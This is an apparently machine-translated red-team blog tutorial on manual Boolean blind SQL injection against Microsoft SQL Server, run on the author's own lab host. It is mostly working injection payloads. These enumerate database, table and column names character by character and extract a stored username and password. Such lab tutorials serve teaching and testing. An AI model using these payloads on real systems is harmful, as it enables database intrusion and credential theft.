saulGoodman
A number of offensive and defensive research focused on the public's Red Team
Note the hands of Microsoft SQL Server Boolean blind
Note START determines whether there
'
and 1=1
and 1=2
Guess database name
First guess dbid exists:
http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
The above statement means that this query dbid=5
is present, the last one =1
is whether there is a meaning! Description existence returns to normal!
Because I built two databases: test
(dbid5), saulgoodman
(dbid6)
So we can check out his existence dbid6
:
http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=6)=1
Query dbid7
, then it will return an error: because it does not exist
According dbid guess the name of the library, the first to guess the length
http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1
Because our dbid5
database name is test
, he's length 4
! dbid=5 and len(name)=4
This statement means that the query dbid=5
whether the length of the database name =4
, that it return to normal length =4
!
http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1
We query dbid6
the database name is saulgoodman
, he's length 11
! dbid=6 and len(name)=11
This statement means that the query dbid=6
whether the length of the database name =11
, that it return to normal length =11
! And so on more than one database query length names!
According dbid queries one by one to query the database name
PS: substring(str,start,len)
intercepting effect of the string, the first string to be taken as a parameter, the second parameter is taken where to start, the third parameter is the length taken
ascii(char)
The 字符
converted ascii
value
Because our dbid5
database name test
, his first character t
is ASCII
code 116
, we can use the following statement to determine:
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116
Followed by the query:
第二个字符:e
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101
第三个字符:s
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115
第四个字符:t
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),4,1)) = 116
So we guess solution database called out: test
!
If you want to second guess the name of the database, then then it dbid
changes to 6
, and then follow the above operation is repeated enough!
Guess the table name
Because we know the database name test
, and then we can use the following statement to query whether the length of a table name equal 5
(table name users
):
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1
Seen from the figure, the page description its return to normal length 5
, so we can guess his character one by one:users
猜解第一个字符:u
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1
猜解第二个字符:s
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1
猜解第三个字符:e
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1
猜解第四个字符:r
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1
猜解第五个字符:s
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1
Because we know that the database name is the test
first 一
one 表名
is users
, and then we can use the following statement to query the first 二
two 表名
characters (table name info
):
猜解第一个字符:i
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1
猜解第二个字符:n
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1
猜解第三个字符:f
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1
猜解第二个字符:o
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1
Guess the column name
Because we know the table name users
, then we can guess users
the table column name column name is the name :( username
)
猜解列名第一个字符:u
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)
猜解列名第二个字符:s
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)
猜解列名第三个字符:e
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)
猜解列名第四个字符:r
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)
猜解列名第五个字符:n
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)
猜解列名第六个字符:a
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)
猜解列名第七个字符:m
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)
猜解列名第八个字符:e
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)
This guess solution out of the 一
column name username
!
The second way: we have id
, username
, password
, age
four columns
Gets the first column is the column name :( id
)
获取第一个字符:i
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105
获取第二个字符:d
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100
Obtaining a second column is the column name :( username
)
获取第一个字符:u
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117
获取第二个字符:s
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115
获取第三个字符:e
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101
获取第四个字符:r
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114
获取第五个字符:n
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110
获取第六个字符:a
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97
获取第七个字符:m
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109
获取第八个字符:e
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101
Gets the third column is the column name :( password
)
获取第一个字符:p
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112
获取第二个字符:a
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97
获取第三个字符:s
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115
获取第四个字符:s
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115
获取第五个字符:w
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119
获取第六个字符:o
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111
获取第七个字符:r
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114
获取第八个字符:d
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100
If you want to get the first 四
row, then continue in the back plus a judgment statements: and name not in ('列名')
on it!
retrieve data
and ascii(substring((select top 1 列名 from 表名),N,1)) >= 65
We know the table name: users
the column name is: username
, passwrd
then we started the burst data :( saul
)
判断username列第一个字符:s
and ascii(substring((select top 1 username from users),1,1)) = 115
判断username列第二个字符:a
and ascii(substring((select top 1 username from users),2,1)) = 97
判断username列第三个字符:u
and ascii(substring((select top 1 username from users),3,1)) = 117
判断username列第四个字符:l
and ascii(substring((select top 1 username from users),4,1)) =108
This will get to the first user name:saul
Obtain saul
passwords :( password saul520
)
判断 password 列第一个字符:s
and ascii(substring((select top 1 password from users),1,1)) =115
判断 password 列第二个字符:a
and ascii(substring((select top 1 password from users),2,1)) =97
判断 password 列第三个字符:u
and ascii(substring((select top 1 password from users),3,1)) =117
判断 password 列第四个字符:l
and ascii(substring((select top 1 password from users),4,1)) =108
判断 password 列第五个字符:5
and ascii(substring((select top 1 password from users),5,1)) =53
判断 password 列第六个字符:2
and ascii(substring((select top 1 password from users),6,1)) =50
判断 password 列第七个字符:0
and ascii(substring((select top 1 password from users),7,1)) =48
Since hieroglyphics Mssql
manual injection of 布尔盲注
it here -